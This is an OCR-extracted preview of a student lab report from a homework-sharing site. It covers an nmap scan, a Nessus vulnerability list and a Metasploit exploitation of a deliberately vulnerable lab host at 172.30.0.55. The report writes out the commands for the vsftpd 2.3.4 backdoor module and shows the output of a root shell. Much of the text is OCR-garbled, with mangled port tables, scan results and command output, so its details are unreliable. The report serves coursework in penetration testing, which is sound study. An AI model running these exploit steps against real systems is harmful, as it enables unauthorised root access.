Week 2 Lab report
docx
keyboard_arrow_up
School
American Military University *
*We aren’t endorsed by this school
Course
262
Subject
Information Systems
Date
Apr 3, 2024
Type
docx
Pages
4
Uploaded by ColonelTapirPerson570
Scan Summary | 172.30.0.55 Scan Summary Nmap 7.40 was initiated at Thu Feb 15 09:08:28 2024 with these arguments: nmap -T4 -A -v 172.30.0.55 Verbosity: 1; Debug level 0 172.30.0.55 Address * 172.30.0.55 - (ipvd) * 00:50:56:AB: Ports :89:CC - VMware (mac) The 977 ports scanned but not shown below are in state: closed Port State (toggle closed [0] | filtered [0]) Service Reason |Product [Version Extra info 21 [tcp [open ftp syn-ack _|vsftpd 234 22 |tcp |open ssh syn-ack | OpenSSH [4.7p1 Debian 8ubuntu1 protocol 2.0 23 |tcp [open telnet syn-ack _|Linux telnetd 25 |tcp [open smtp syn-ack _|Postfix smtpd 53 |tcp [open domain syn-ack _[ISC BIND 9.4.2 80 |tcp |open http syn-ack |Apache httpd 2.2.8 (Ubuntu) DAV/2 111 [tcp [open rpebind syn-ack 2 RPC #100000 139 _|tep [open netbios-ssn__|syn-ack _|Samba smbd 3.x-4.x [ workgroup: WORKGROUP 445 _|tcp [open netbios-ssn__|syn-ack _|Samba smbd 3.0.20-Debian [ workgroup: WORKGROUP 512 _|tcp |open exec syn-ack _[netkit-rsh rexecd 513 _|tcp |open login syn-ack 514 |tcp [open shell syn-ack _[Netkit rshd 1099 [tcp [open java-rmi [syn-ack [3ava RMI Registry 1524 |tcp [open shell syn-ack root shell 2049 [tcp [open nfs syn-ack 3-4 RPC #100003 2121 |tcp [open fto syn-ack _|ProFTPD 131 3306 |tcp [open mysal syn-ack |MySQL 5.0.51a-3ubuntus 5432 |tcp [open syn-ack greSQL DB 8.3.0-8.3.7 5900 |tcp [open [vc [syn-ack [vnc protocol 3.3 6000 [tcp [open x11 syn-ack access denied 6667 |tcp |open irc [syn-ack _[unrealiRcd 8009 |tcp |open 2ip13 syn-ack _|Apache Jserv Protocol v1.3 8180 |tcp |open http [syn-ack _[Apache Tomcat/Coyote ISP engine 11 Operating Sy i Used port: 21/tcp (open) Used port: 33510/udp (closed) 0S match: Linux 2.6.9 - 2.6.33 (100%) Traceroute Information (click to expand) Misc Metrics (click to expand)
( nessus BrianDuvall_S1_Victimscan TABLE OF CONTENTS Vulnerabilities by Host 172.30.0.55 CRITCAL Severity CVS5V30 Pugin RC 98 RITICAL 98 meaL 100 RITICAL 100 RmC 100* RITCAL 10.0* RIICAL 100* RIICAL 10.0* RIICAL 100* 75 75 75 75 75* 68 65 €5 65 DOONOEaQOCERRAARnAAnE MEDIUM W wro Name Apache Tomcat AJP Conn or Request Injection (Ghostcat) Bind Shell Backdoor Detection Unix Operating System Unsupported Version Detection Unsupported Web Server Detection Debian OpenSSH/OpenSSL Package Random Number Generator Weakness Debian OpenSSH/OpenSSL Package Random Number Generator Weakness (SSL check) NFS Exported Share Information Disclosure VNC Server ‘password' Password rexecd Service Detection 1SC BIND Service Downgrade / Reflected DoS 1SC BIND Denial of Service NFS Shares World Readable SSL Medium Strangth Cipher Suites Supported (SWEET32) S5L Version 2 and 3 Protocol Detection Samba Badlock Vulnerability rlogin Service Detection S5Lv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE) ISCBIND 5. <9.11.22.9.12.x <9.16.6,9.17.x < 3.17.4 DoS S5L Certificate Cannot Be Trusted TLS Version 1.0 Protocol Detection
B root@kali: ~ onu o BSOLUTELY NO o i i AR AR i i 4 # ; :
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
- Access to all documents
- Unlimited textbook solutions
- 24/7 expert homework help
wsf > use exploit/unix/ftp/vsftpd 234 _backdoor msf exploit(vsftpd 234 backdoor) > set RHOST 172.30.0.55 RHOST => 172.30.0.55 wsf exploit(vsftpd 234 backdoor) > exploit *] Banner: 220 (vsFTPd 2.3.4) *] USER: 331 Please specify the password. [+] Backdoor service has been spawned, handling.. UID: uid=0(root) gid=0(root) Found shell. Command shell session 1 opened (172.30.0.7:42878 -> 172.30.0.55:6200) at 2024-02-15 09:51:12 -0800 Link encap:Ethernet HWaddr 00:50:56:ab:89:cc inet addr:172.30.0.55 Bcast:172.30.0.255 Mask:255.255.255.0 ineté addr: feB80::250:56ff:feab:89cc/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:28345 errors:0 dropped:0 overruns:0 frame:0 TX packets:23327 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txgqueuelen:1000 RX bytes:3277832 (3.1 MB) TX bytes:8802367 (8.3 MB) Base address:0x2000 Memory:fdSc0000-£dSe0000 Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:289 errors:0 dropped:0 overruns:0 frame:0 TX packets:289 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txgqueuelen:0 RX bytes:116289 (113.5 KB) TX bytes:116289 (113.5 KB) iptables --list Chain INPUT (policy ACCEPT) target . prot opt source destination Chain FORWARD (policy ACCEPT) target . jad afu) A=) ] A Tu} b} of ol destination Chain OUTPUT (policy ACCEPT) o8-} ofs (3 A ) o= ) A=) <} AT ]P0 afad ] destination Solution Validate and recompile a legitimate copy of the source code.